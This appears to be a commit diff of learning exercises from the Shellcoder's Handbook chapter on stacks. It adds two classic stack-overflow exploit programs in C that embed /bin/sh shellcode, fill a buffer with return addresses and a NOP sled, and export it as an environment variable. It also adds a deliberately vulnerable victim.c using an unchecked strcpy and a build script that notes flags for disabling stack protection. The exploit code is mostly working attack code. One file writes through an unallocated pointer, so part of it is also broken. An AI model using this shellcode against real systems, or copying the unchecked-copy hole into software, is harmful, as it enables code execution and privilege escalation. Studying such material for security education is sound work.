Shellcoder handbook

shellcoders_handbook/funcs_and_stacks/exploit.c

@@ -0,0 +1,49 @@
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#define offset_size 0
+#define buffer_size 512
+
+//char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80";
+
+char sc[] =
+    "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+    "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+    "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+unsigned long find_start(void){
+  __asm__("movl %esp,%eax");
+}
+
+int main(int argc, char *argv[]){
+
+  char *buff, *ptr;
+  long *addr_ptr, addr;
+  int offset=offset_size, bsize=buffer_size;
+
+  if (argc > 1) bsize = atoi(argv[1]);
+  if (argc > 2) offset = atoi(argv[2]);
+
+  addr = find_start() - offset;
+  printf("Attempting address: 0x%x\n", addr);
+  printf("ADDR %x", addr);
+  ptr = buff;
+  addr_ptr = (long *)ptr;
+
+  for (int i=0; i < bsize; i += 4){
+    //printf("ADDR %s", addr);
+    *(addr_ptr++) = addr;
+  }
+  ptr += 4;
+
+  for (int i=0; i < strlen(sc); i++)
+    *(ptr++) = sc[i];
+
+  buff[bsize - 1] = '\0';
+  memcpy(buff, "BUF=", 4);
+  putenv(buff);
+  system("/bin/bash");
+
+  return 0;
+}

shellcoders_handbook/funcs_and_stacks/exploit_nops.c

@@ -0,0 +1,52 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#define DEFAULT_OFFSET                    0
+#define DEFAULT_BUFFER_SIZE             512
+#define NOP                            0x90
+
+char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80";
+
+/*char shellcode[] =
+"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+*/
+
+unsigned long get_sp(void) {
+  __asm__("movl %esp,%eax");
+}
+void main(int argc, char *argv[]){
+  char *buff, *ptr;
+  long *addr_ptr, addr;
+  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+  int i;
+
+  if (argc > 1) bsize  = atoi(argv[1]);
+  if (argc > 2) offset = atoi(argv[2]);
+  if (!(buff = malloc(bsize))) {
+     printf("Can’t allocate memory.\n");
+     exit(0);
+  }
+
+  addr = get_sp() - offset;
+  printf("Using address: 0x%x\n", addr);
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+
+  for (i = 0; i < bsize; i+=4)
+    *(addr_ptr++) = addr;
+
+  for (i = 0; i < bsize/2; i++)
+    buff[i] = NOP;
+  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
+
+  for (i = 0; i < strlen(shellcode); i++)
+    *(ptr++) = shellcode[i];
+
+  buff[bsize - 1] = '\0';
+  memcpy(buff,"BUF=",4);
+  putenv(buff);
+  system("/bin/bash");
+ }

shellcoders_handbook/funcs_and_stacks/function.c

@@ -0,0 +1,10 @@
+#include <stdio.h>
+
+function(int a, int b){
+  int array[5];
+}
+
+main(){
+  function(1, 2);
+  printf("This is where the return address points");
+}

shellcoders_handbook/funcs_and_stacks/run.sh

@@ -0,0 +1,9 @@
+#!/usr/bin/env bash
+
+file=$1
+# -gddb; compile gdb output used for debugging
+# -mpreferred-stack-boundary ; will setup our stack into dword size increments.
+# Otherwise gcc will optimize the stack and make things more difficult then they need to be at this point.
+cc -mpreferred-stack-boundary=2 -ggdb "$file".c -o "$file"
+
+#gcc -fno-stack-protector -z execstack "$file".c -o "$file"

shellcoders_handbook/funcs_and_stacks/victim.c

@@ -0,0 +1,9 @@
+#include <stdio.h>
+#include <string.h>
+
+int main(int argc, char *argv[]){
+  char little_array[512];
+  if (argc > 1)
+    strcpy(little_array, argv[1]);
+  return 0;
+}